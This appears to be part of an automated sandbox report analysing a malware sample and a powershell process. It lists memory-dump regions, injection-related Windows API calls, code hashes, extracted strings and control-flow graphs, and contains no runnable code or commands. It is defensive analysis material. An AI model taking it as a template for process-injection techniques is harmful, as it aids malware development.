                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0777D49E
                                Memory Dump Source
                                • Source File: 0000000A.00000002.2163955662.0000000007770000.00000040.00000800.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7770000_RTUZKYTc.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 95b3f55060018a1838c2f419a7a182b7b1b65acdb732f75906050b5e92361e44
                                • Instruction ID: 35b91b6a62b40f199a26df16e382b2f322877ae8d988bdf2010381c4e4131e85
                                • Opcode Fuzzy Hash: 95b3f55060018a1838c2f419a7a182b7b1b65acdb732f75906050b5e92361e44
                                • Instruction Fuzzy Hash: 83110AB59002499FCB20DFAAC845BDEBFF5FF88314F148419D519A7250C779A544CFA1
                                APIs
                                Memory Dump Source
                                • Source File: 0000000A.00000002.2163955662.0000000007770000.00000040.00000800.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7770000_RTUZKYTc.jbxd
                                Similarity
                                • API ID: ResumeThread
                                • String ID:
                                • API String ID: 947044025-0
                                • Opcode ID: 7f5d0828c417be72f768927ff708db3c9d82b9610cd0f0d03b281db10172406f
                                • Instruction ID: 57473e23f534840ff5cd03c2e611288f2a0820297ae42be9794ec9700a617b93
                                • Opcode Fuzzy Hash: 7f5d0828c417be72f768927ff708db3c9d82b9610cd0f0d03b281db10172406f
                                • Instruction Fuzzy Hash: 471149B18002488FCB20DFAAC4457EEFFF9EF89310F248819D559A7240CB79A940CBA0
                                APIs
                                • PostMessageW.USER32(?,?,?,?), ref: 0E9611D5
                                Memory Dump Source
                                • Source File: 0000000A.00000002.2176379798.000000000E960000.00000040.00000800.00020000.00000000.sdmp, Offset: 0E960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_e960000_RTUZKYTc.jbxd
                                Similarity
                                • API ID: MessagePost
                                • String ID:
                                • API String ID: 410705778-0
                                • Opcode ID: 9238df5df4e27e8b3633eb0a264fb44f948a0af664124a78554827370a8dc816
                                • Instruction ID: e7cdc78474514720b79c7e857f91ba613e52ab8ed772579cba4662ee2f3665de
                                • Opcode Fuzzy Hash: 9238df5df4e27e8b3633eb0a264fb44f948a0af664124a78554827370a8dc816
                                • Instruction Fuzzy Hash: 9D1113B58003489FDB10CF9AC545BDEBFF8EB48314F20881AD558A7240C379A944CFA1
                                APIs
                                Memory Dump Source
                                • Source File: 0000000A.00000002.2163955662.0000000007770000.00000040.00000800.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7770000_RTUZKYTc.jbxd
                                Similarity
                                • API ID: ResumeThread
                                • String ID:
                                • API String ID: 947044025-0
                                • Opcode ID: 18bd1a2e7defaebe9d3f0ca9659fce602c4e7273614e8a88c41f1ac7c0f336ee
                                • Instruction ID: 79789574094429e694f30443c4e42aeda7edacd7e95073c621f011b0ba79dd35
                                • Opcode Fuzzy Hash: 18bd1a2e7defaebe9d3f0ca9659fce602c4e7273614e8a88c41f1ac7c0f336ee
                                • Instruction Fuzzy Hash: 61110AB1D002498FDB20DFAAC4457EEFBF9EF88714F248419D519A7240CB79A944CBA5
                                APIs
                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0124B59E
                                Memory Dump Source
                                • Source File: 0000000A.00000002.2138162260.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_1240000_RTUZKYTc.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                • Opcode ID: ab823a5f75c4808d94557b043d4ad988084949d8bb4e811b12d955a84a6ce1ae
                                • Instruction ID: 3e0ba76367f83e53b9f35c066f1a6d0c04da87a0b60c9c431e437cd99c6eb708
                                • Opcode Fuzzy Hash: ab823a5f75c4808d94557b043d4ad988084949d8bb4e811b12d955a84a6ce1ae
                                • Instruction Fuzzy Hash: 771110B5C102498FDB24CFAAD444BDEFBF4EF88310F14841AD918A7200D379A545CFA1
                                APIs
                                • PostMessageW.USER32(?,?,?,?), ref: 0E9611D5
                                Memory Dump Source
                                • Source File: 0000000A.00000002.2176379798.000000000E960000.00000040.00000800.00020000.00000000.sdmp, Offset: 0E960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_e960000_RTUZKYTc.jbxd
                                Similarity
                                • API ID: MessagePost
                                • String ID:
                                • API String ID: 410705778-0
                                • Opcode ID: b9df3d475fc09b37679bafefa53225e49c39c196a518877d0a7b43c8bbbcc5fa
                                • Instruction ID: f2ea41e564f3331ce56b3f591014cf28dc64294ce5a6225442a876f8792a4c4e
                                • Opcode Fuzzy Hash: b9df3d475fc09b37679bafefa53225e49c39c196a518877d0a7b43c8bbbcc5fa
                                • Instruction Fuzzy Hash: 8F11D0B58003499FDB10DF9AC985BDEBBF8FB48324F10841AE958A7240C379A944CFA5
                                Memory Dump Source
                                • Source File: 0000000A.00000002.2137297559.000000000109D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0109D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_109d000_RTUZKYTc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a9c51c68abe14878ac0645035e476d7bb89295db0decddd857fc382a4aceef8a
                                • Instruction ID: c5b9716704ee509c6845a04a1f6b3b37f04fcdc4b7657371efb9731e18ec639a
                                • Opcode Fuzzy Hash: a9c51c68abe14878ac0645035e476d7bb89295db0decddd857fc382a4aceef8a
                                • Instruction Fuzzy Hash: 8B216A71540200DFCF05DF58D9D0F2ABFA5FB88318F20C5A9E9490B256C336D406D7A1
                                Memory Dump Source
                                • Source File: 0000000A.00000002.2137429865.00000000010AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010AD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_10ad000_RTUZKYTc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a2d19ab2d4a5217ed49da19abd2792fe7e6e955c64d0dbf5505ae514e189389a
                                • Instruction ID: ecbb81084935657d20333f001e249eecddf49ff7ab2f7c6a72de70621b652ac0
                                • Opcode Fuzzy Hash: a2d19ab2d4a5217ed49da19abd2792fe7e6e955c64d0dbf5505ae514e189389a
                                • Instruction Fuzzy Hash: 4E212271684200DFCB15DFA8D980F26BFA5FB88354F60C5ADE98A4B656C33AD407CB61
                                Memory Dump Source
                                • Source File: 0000000A.00000002.2137429865.00000000010AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010AD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_10ad000_RTUZKYTc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 908b9da3ec14122ae99c2b06fd6b07fb891351d56636ccb8f6d3f5bdf70d4ea3
                                • Instruction ID: 1bb80e9297bf25fe66fb474991a29e35eeb6608e98be4c861f8ca6052053c94b
                                • Opcode Fuzzy Hash: 908b9da3ec14122ae99c2b06fd6b07fb891351d56636ccb8f6d3f5bdf70d4ea3
                                • Instruction Fuzzy Hash: 32210771504204EFDB05DFD8D5C0F2ABBA5FB94324F60C5ADD9894B656C33AD406CB61
                                Memory Dump Source
                                • Source File: 0000000A.00000002.2137429865.00000000010AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010AD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_10ad000_RTUZKYTc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 862f1702802b1c78ca59f15d9a61cce81d11a44b8186675e5d40f3fa5de7590f
                                • Instruction ID: 400cc396603d0699e34582b23b8d1c32fc73202846720b3619a53ace9360e19f
                                • Opcode Fuzzy Hash: 862f1702802b1c78ca59f15d9a61cce81d11a44b8186675e5d40f3fa5de7590f
                                • Instruction Fuzzy Hash: B12183755483809FCB03CF64D994B11BFB1EB46214F28C5DAD8898F6A7C33A9816CB62
                                Memory Dump Source
                                • Source File: 0000000A.00000002.2137297559.000000000109D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0109D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_109d000_RTUZKYTc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                • Instruction ID: 42c48482266092b74f45e4180b1023e32b380d65390c233c71c18363084413cb
                                • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                • Instruction Fuzzy Hash: F111DF76444280CFCF02CF54D5C4B16BFB1FB88314F24C6A9D9490B256C336D45ADBA2
                                Memory Dump Source
                                • Source File: 0000000A.00000002.2137429865.00000000010AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010AD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_10ad000_RTUZKYTc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                • Instruction ID: 4b6e0ff82f3c803fbded00f159c8c73bae3ecce4f739931029f3b46b235afe92
                                • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                • Instruction Fuzzy Hash: FA11BB75504280DFDB02CF94C5C4B15BFA1FB84224F24C6A9D8894B6A6C33AD40ACB62

                                Execution Graph

                                Execution Coverage:7.4%
                                Dynamic/Decrypted Code Coverage:0%
                                Signature Coverage:0%
                                Total number of Nodes:3
                                Total number of Limit Nodes:0
                                execution_graph 21509 8e36490 21510 8e36498 SetThreadToken 21509->21510 21512 8e36501 21510->21512

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 904 4e5b490-4e5b4b9 905 4e5b4be-4e5b7f9 call 4e5aab4 904->905 906 4e5b4bb 904->906 967 4e5b7fe-4e5b805 905->967 906->905
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6c47232d7ca5d6b92dd98139fc1055b3b4d5a3ef1e65ecfd10d6bc535eabb672
                                • Instruction ID: 1a5dcbd838a9236c167e8a899d1c446f7c0ac9acffd7e0b7a171619113797bf3
                                • Opcode Fuzzy Hash: 6c47232d7ca5d6b92dd98139fc1055b3b4d5a3ef1e65ecfd10d6bc535eabb672
                                • Instruction Fuzzy Hash: A491A374B007149BEF19EFB484115AEB7E2EF84604B10C92ED59AAB350DF34AD06CBD6

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 968 4e5b4a0-4e5b4b9 969 4e5b4be-4e5b7f9 call 4e5aab4 968->969 970 4e5b4bb 968->970 1031 4e5b7fe-4e5b805 969->1031 970->969
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2fe3e32f7a0577e5bbb664a4bfd761b5bb9ad9ed27b4911b134a2f03245ace1e
                                • Instruction ID: 0447440dcd6a1a51e78c960f7620c8d1807cfcf1bfdc23471a33a337e5e33006
                                • Opcode Fuzzy Hash: 2fe3e32f7a0577e5bbb664a4bfd761b5bb9ad9ed27b4911b134a2f03245ace1e
                                • Instruction Fuzzy Hash: B491B274B007149BEF19EFB484115AEB7E6EF84604B10C92ED58AAB350DF34AD06CBD6
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2149828474.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_7cc0000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4']q$4']q$pij$pij$pij$pij$pij$|,j
                                • API String ID: 0-1921836591
                                • Opcode ID: 9b8c9ab48bffaa6682c4e2ccd89263f51c097969afaa605882b9270947e3664d
                                • Instruction ID: 72625c05a7be90fb21034ddc8215430e97fdede8b794e36d9c1e3d701951feac
                                • Opcode Fuzzy Hash: 9b8c9ab48bffaa6682c4e2ccd89263f51c097969afaa605882b9270947e3664d
                                • Instruction Fuzzy Hash: 912246B1B00306DFCB25DB69C4816AABBE6FF85210F1480BEE945DF251CB35D945CBA2

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 201 7cc3ce8-7cc3d0d 202 7cc3f00-7cc3f4a 201->202 203 7cc3d13-7cc3d18 201->203 213 7cc40ce-7cc4112 202->213 214 7cc3f50-7cc3f55 202->214 204 7cc3d1a-7cc3d20 203->204 205 7cc3d30-7cc3d34 203->205 206 7cc3d24-7cc3d2e 204->206 207 7cc3d22 204->207 208 7cc3d3a-7cc3d3c 205->208 209 7cc3eb0-7cc3eba 205->209 206->205 207->205 211 7cc3d4c 208->211 212 7cc3d3e-7cc3d4a 208->212 215 7cc3ebc-7cc3ec5 209->215 216 7cc3ec8-7cc3ece 209->216 218 7cc3d4e-7cc3d50 211->218 212->218 235 7cc4228-7cc425d 213->235 236 7cc4118-7cc411d 213->236 219 7cc3f6d-7cc3f71 214->219 220 7cc3f57-7cc3f5d 214->220 221 7cc3ed4-7cc3ee0 216->221 222 7cc3ed0-7cc3ed2 216->222 218->209 225 7cc3d56-7cc3d75 218->225 223 7cc3f77-7cc3f79 219->223 224 7cc4080-7cc408a 219->224 226 7cc3f5f 220->226 227 7cc3f61-7cc3f6b 220->227 229 7cc3ee2-7cc3efd 221->229 222->229 231 7cc3f89 223->231 232 7cc3f7b-7cc3f87 223->232 233 7cc408c-7cc4094 224->233 234 7cc4097-7cc409d 224->234 269 7cc3d85 225->269 270 7cc3d77-7cc3d83 225->270 226->219 227->219 237 7cc3f8b-7cc3f8d 231->237 232->237 238 7cc409f-7cc40a1 234->238 239 7cc40a3-7cc40af 234->239 252 7cc425f-7cc4281 235->252 253 7cc428b-7cc4295 235->253 241 7cc411f-7cc4125 236->241 242 7cc4135-7cc4139 236->242 237->224 246 7cc3f93-7cc3fb2 237->246 247 7cc40b1-7cc40cb 238->247 239->247 248 7cc4129-7cc4133 241->248 249 7cc4127 241->249 250 7cc413f-7cc4141 242->250 251 7cc41da-7cc41e4 242->251 285 7cc3fb4-7cc3fc0 246->285 286 7cc3fc2 246->286 248->242 249->242 258 7cc4151 250->258 259 7cc4143-7cc414f 250->259 255 7cc41e6-7cc41ee 251->255 256 7cc41f1-7cc41f7 251->256 296 7cc42d5-7cc42dc 252->296 297 7cc4283-7cc4288 252->297 267 7cc429f-7cc42a5 253->267 268 7cc4297-7cc429c 253->268 263 7cc41fd-7cc4209 256->263 264 7cc41f9-7cc41fb 256->264 265 7cc4153-7cc4155 258->265 259->265 272 7cc420b-7cc4225 263->272 264->272 265->251 273 7cc415b-7cc415d 265->273 274 7cc42ab-7cc42b7 267->274 275 7cc42a7-7cc42a9 267->275 276 7cc3d87-7cc3d89 269->276 
270->276 279 7cc415f-7cc4165 273->279 280 7cc4177-7cc417e 273->280 282 7cc42b9-7cc42d2 274->282 275->282 276->209 283 7cc3d8f-7cc3d96 276->283 287 7cc4169-7cc4175 279->287 288 7cc4167 279->288 290 7cc4196-7cc41d7 280->290 291 7cc4180-7cc4186 280->291 283->202 292 7cc3d9c-7cc3da1 283->292 298 7cc3fc4-7cc3fc6 285->298 286->298 287->280 288->280 299 7cc4188 291->299 300 7cc418a-7cc4194 291->300 301 7cc3db9-7cc3dc8 292->301 302 7cc3da3-7cc3da9 292->302 305 7cc42de-7cc42fe 296->305 298->224 306 7cc3fcc-7cc4003 298->306 299->290 300->290 301->209 313 7cc3dce-7cc3dec 301->313 303 7cc3dad-7cc3db7 302->303 304 7cc3dab 302->304 303->301 304->301 319 7cc432d-7cc434c 305->319 320 7cc4300-7cc4326 305->320 323 7cc401d-7cc4024 306->323 324 7cc4005-7cc400b 306->324 313->209 326 7cc3df2-7cc3e17 313->326 319->305 330 7cc434e-7cc435c 319->330 320->319 331 7cc403c-7cc407d 323->331 332 7cc4026-7cc402c 323->332 328 7cc400d 324->328 329 7cc400f-7cc401b 324->329 326->209 351 7cc3e1d-7cc3e24 326->351 328->323 329->323 333 7cc435e-7cc437b 330->333 334 7cc4395-7cc439f 330->334 335 7cc402e 332->335 336 7cc4030-7cc403a 332->336 348 7cc437d-7cc438f 333->348 349 7cc43e5-7cc43ea 333->349 341 7cc43a8-7cc43ae 334->341 342 7cc43a1-7cc43a5 334->342 335->331 336->331 344 7cc43b4-7cc43c0 341->344 345 7cc43b0-7cc43b2 341->345 350 7cc43c2-7cc43e2 344->350 345->350 348->334 349->348 353 7cc3e6a-7cc3e9d 351->353 354 7cc3e26-7cc3e41 351->354 368 7cc3ea4-7cc3ead 353->368 359 7cc3e5b-7cc3e5f 354->359 360 7cc3e43-7cc3e49 354->360 365 7cc3e66-7cc3e68 359->365 362 7cc3e4d-7cc3e59 360->362 363 7cc3e4b 360->363 362->359 363->359 365->368
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2149828474.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_7cc0000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4']q$4']q$4']q$4']q
                                • API String ID: 0-1785108022
                                • Opcode ID: 89e01f1a730934dd054732d7905ba3e768e4a15fbc3b6a0535555abce7a2c00b
                                • Instruction ID: 3c904911f11744c09ae5c1d9bceee98b3855de7bda4de776941238ff2d63a52d
                                • Opcode Fuzzy Hash: 89e01f1a730934dd054732d7905ba3e768e4a15fbc3b6a0535555abce7a2c00b
                                • Instruction Fuzzy Hash: BE125AB17043918FCB29DB6894617AABFB69FC2310F14C4BED545DB291DB31CA41CBA2

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 372 8e36488-8e3648e 373 8e36490-8e36496 372->373 374 8e36498-8e364cb 372->374 373->374 375 8e364d3-8e364ff SetThreadToken 374->375 376 8e36501-8e36507 375->376 377 8e36508-8e36525 375->377 376->377
                                APIs
                                • SetThreadToken.KERNELBASE(?), ref: 08E364F2
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2152442795.0000000008E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_8e30000_powershell.jbxd
                                Similarity
                                • API ID: ThreadToken
                                • String ID:
                                • API String ID: 3254676861-0
                                • Opcode ID: 05fd8f1cb5311d1b9428eb992d59f6da3a18c867d9c89752154161fb1b191550
                                • Instruction ID: 8d8d5719e81599a01ab41b32a25f31e59601063062c7a94cf0fcbcaf0e4d4b9b
                                • Opcode Fuzzy Hash: 05fd8f1cb5311d1b9428eb992d59f6da3a18c867d9c89752154161fb1b191550
                                • Instruction Fuzzy Hash: F51167B29002489FDB10DFAAD585B9EFFF8AF49320F108869D418A7210C774A944CFA0

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 380 8e36490-8e364ff SetThreadToken 383 8e36501-8e36507 380->383 384 8e36508-8e36525 380->384 383->384
                                APIs
                                • SetThreadToken.KERNELBASE(?), ref: 08E364F2
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2152442795.0000000008E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_8e30000_powershell.jbxd
                                Similarity
                                • API ID: ThreadToken
                                • String ID:
                                • API String ID: 3254676861-0
                                • Opcode ID: 410cd2c4527df6791c2a58e62b7c9b6024e4adb60822104e86d6ea62d83678e2
                                • Instruction ID: 4617a85875a6097bebbc4ea9220459227e75b3c4d09c7250b6c6f474cf4f2da8
                                • Opcode Fuzzy Hash: 410cd2c4527df6791c2a58e62b7c9b6024e4adb60822104e86d6ea62d83678e2
                                • Instruction Fuzzy Hash: B91125B19002488FCB10DF9AD584B9EFBF8EF48324F248469D418A7210C778A944CFA0

                                Control-flow Graph
                                control_flow_graph 387 4e5e5c1-4e5e5c8 388 4e5e62a-4e5e630 387->388 389 4e5e5ca-4e5e60a 387->389 390 4e5e693-4e5e6b6 388->390 391 4e5e632-4e5e689 388->391 402 4e5e6bc-4e5e6d3 390->402 403 4e5e73a-4e5e753 390->403 391->390 409 4e5e6db-4e5e738 402->409 406 4e5e755 403->406 407 4e5e75e 403->407 406->407 408 4e5e75f 407->408 408->408 409->402 409->403
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: pij
                                • API String ID: 0-2463107502
                                • Opcode ID: f46abb7136a08bd06ca9465561a5e488552a6e5a80b5692cc2ffa69c857de028
                                • Instruction ID: d3825c943010d04a6690ce3f5c4d4eab006742aa1556d88d1b6d92836f64fec7
                                • Opcode Fuzzy Hash: f46abb7136a08bd06ca9465561a5e488552a6e5a80b5692cc2ffa69c857de028
                                • Instruction Fuzzy Hash: B641DD34A012049FCB15DFB9E954A9EBBF2FF49300F1085AAD445EB361DB74AD05CB91

                                Control-flow Graph
                                control_flow_graph 417 4e56fe0-4e56fff 418 4e57105-4e57143 417->418 419 4e57005-4e57008 417->419 446 4e5700a call 4e57697 419->446 447 4e5700a call 4e5767c 419->447 420 4e57010-4e57022 422 4e57024 420->422 423 4e5702e-4e57043 420->423 422->423 429 4e570ce-4e570e7 423->429 430 4e57049-4e57059 423->430 435 4e570f2 429->435 436 4e570e9 429->436 431 4e57065-4e5707d call 4e5bf20 430->431 432 4e5705b 430->432 439 4e570bd-4e570c8 431->439 440 4e5707f-4e5708f 431->440 432->431 435->418 436->435 439->429 439->430 441 4e57091-4e570a1 440->441 442 4e570ab-4e570b5 440->442 444 4e570a9 441->444 442->439 444->439 446->420 447->420
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: (aq
                                • API String ID: 0-600464949
                                • Opcode ID: 6e00049e89fc931580cb397d6bcad7d87b8b8160614915c76d1c651c2b4ec30d
                                • Instruction ID: 3928953ae1de14e4473c04a7ec8eed8ed43dfa1cf40d48c9c4388b4e1dd55633
                                • Opcode Fuzzy Hash: 6e00049e89fc931580cb397d6bcad7d87b8b8160614915c76d1c651c2b4ec30d
                                • Instruction Fuzzy Hash: 45416D34B042048FDB14DFA9C558AAEBBF2EF8D315F145099E806AB3A1CB35EC01CB60

                                Control-flow Graph
                                control_flow_graph 448 4e5e610-4e5e630 449 4e5e693-4e5e6b6 448->449 450 4e5e632-4e5e689 448->450 457 4e5e6bc-4e5e6d3 449->457 458 4e5e73a-4e5e753 449->458 450->449 464 4e5e6db-4e5e738 457->464 461 4e5e755 458->461 462 4e5e75e 458->462 461->462 463 4e5e75f 462->463 463->463 464->457 464->458
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: pij
                                • API String ID: 0-2463107502
                                • Opcode ID: d17b5d2fd75050447efd4b11c3b3756382e2173774ca9c4edb8a03e3f3ebd5cf
                                • Instruction ID: b07e42a04fc44fa9b7e752a821bfe32cf66f25d7a89a4a75e8adccba5c95e23a
                                • Opcode Fuzzy Hash: d17b5d2fd75050447efd4b11c3b3756382e2173774ca9c4edb8a03e3f3ebd5cf
                                • Instruction Fuzzy Hash: 0341DB34A002048FCB15CFAAD954A9EBBF6FF49300F1085A9D446AB3A1DB74AC04CBA1

                                Control-flow Graph
                                control_flow_graph 493 4e5e640-4e5e6b6 500 4e5e6bc-4e5e6d3 493->500 501 4e5e73a-4e5e753 493->501 507 4e5e6db-4e5e738 500->507 504 4e5e755 501->504 505 4e5e75e 501->505 504->505 506 4e5e75f 505->506 506->506 507->500 507->501
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: pij
                                • API String ID: 0-2463107502
                                • Opcode ID: 55b8719cd105bf89851be2fc8093dc841fca2ec68a25e57c4633d482ede9b160
                                • Instruction ID: 15b15797882a0c048db2b0d1e278e8ee0b04b5711b8056773cb8b49026c2bae9
                                • Opcode Fuzzy Hash: 55b8719cd105bf89851be2fc8093dc841fca2ec68a25e57c4633d482ede9b160
                                • Instruction Fuzzy Hash: 05318C34A012159FCB24DF7AE594A9EBBF6FF88300F108528D41AAB390DB74AD05CB91

                                Control-flow Graph
                                control_flow_graph 515 4e5afa8-4e5afb1 call 4e5a79c 517 4e5afb6-4e5afba 515->517 518 4e5afbc-4e5afc9 517->518 519 4e5afca-4e5b065 517->519 525 4e5b067-4e5b06d 519->525 526 4e5b06e-4e5b08b 519->526 525->526
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: (&]q
                                • API String ID: 0-1343553580
                                • Opcode ID: 2e870ddcb7cff52a3fa5f7ce4667a721be033e8ef3c2259aee5604a8486c5cbf
                                • Instruction ID: e332c36714459f8d7593f6a90943523ec9f5e19e73a6a0989da7709c5ae93129
                                • Opcode Fuzzy Hash: 2e870ddcb7cff52a3fa5f7ce4667a721be033e8ef3c2259aee5604a8486c5cbf
                                • Instruction Fuzzy Hash: 9D21DC75A003588FCB14DFAED4006AFBBF9EF89320F24846AD418A7350CA74A805CBA5

                                Control-flow Graph
                                control_flow_graph 724 7cc17b8-7cc17da 725 7cc1969-7cc197c 724->725 726 7cc17e0-7cc17e5 724->726 736 7cc197e-7cc1996 725->736 737 7cc1997-7cc19b5 725->737 727 7cc17fd-7cc1801 726->727 728 7cc17e7-7cc17ed 726->728 731 7cc1914-7cc191e 727->731 732 7cc1807-7cc180b 727->732 729 7cc17ef 728->729 730 7cc17f1-7cc17fb 728->730 729->727 730->727 738 7cc192c-7cc1932 731->738 739 7cc1920-7cc1929 731->739 734 7cc180d-7cc181e 732->734 735 7cc184b 732->735 734->725 757 7cc1824-7cc1829 734->757 743 7cc184d-7cc184f 735->743 736->737 744 7cc19bb-7cc19c0 737->744 745 7cc1b04-7cc1b34 737->745 740 7cc1938-7cc1944 738->740 741 7cc1934-7cc1936 738->741 746 7cc1946-7cc1966 740->746 741->746 743->731 748 7cc1855-7cc1859 743->748 749 7cc19d8-7cc19dc 744->749 750 7cc19c2-7cc19c8 744->750 759 7cc1b44 745->759 760 7cc1b36-7cc1b42 745->760 748->731 758 7cc185f-7cc1863 748->758 755 7cc1ab4-7cc1abe 749->755 756 7cc19e2-7cc19e4 749->756 751 7cc19cc-7cc19d6 750->751 752 7cc19ca 750->752 751->749 752->749 764 7cc1acc-7cc1ad2 755->764 765 7cc1ac0-7cc1ac9 755->765 762 7cc19f4 756->762 763 7cc19e6-7cc19f2 756->763 766 7cc182b-7cc1831 757->766 767 7cc1841-7cc1849 757->767 768 7cc1865-7cc186e 758->768 769 7cc1886 758->769 771 7cc1b46-7cc1b48 759->771 760->771 772 7cc19f6-7cc19f8 762->772 763->772 776 7cc1ad8-7cc1ae4 764->776 777 7cc1ad4-7cc1ad6 764->777 774 7cc1835-7cc183f 766->774 775 7cc1833 766->775 767->743 778 7cc1875-7cc1882 768->778 779 7cc1870-7cc1873 768->779 773 7cc1889-7cc1911 769->773 780 7cc1b7c-7cc1b86 771->780 781 7cc1b4a-7cc1b50 771->781 772->755 783 7cc19fe-7cc1a16 772->783 774->767 775->767 784 7cc1ae6-7cc1b01 776->784 777->784 785 7cc1884 778->785 779->785 792 7cc1b88-7cc1b8d 780->792 793 7cc1b90-7cc1b96 780->793 788 7cc1b5e-7cc1b79 781->788 789 7cc1b52-7cc1b54 781->789 800 7cc1a18-7cc1a1e 783->800 801 7cc1a30-7cc1a34 783->801 785->773 789->788 794 7cc1b9c-7cc1ba8 793->794 795 7cc1b98-7cc1b9a 793->795 798 7cc1baa-7cc1bc1 794->798 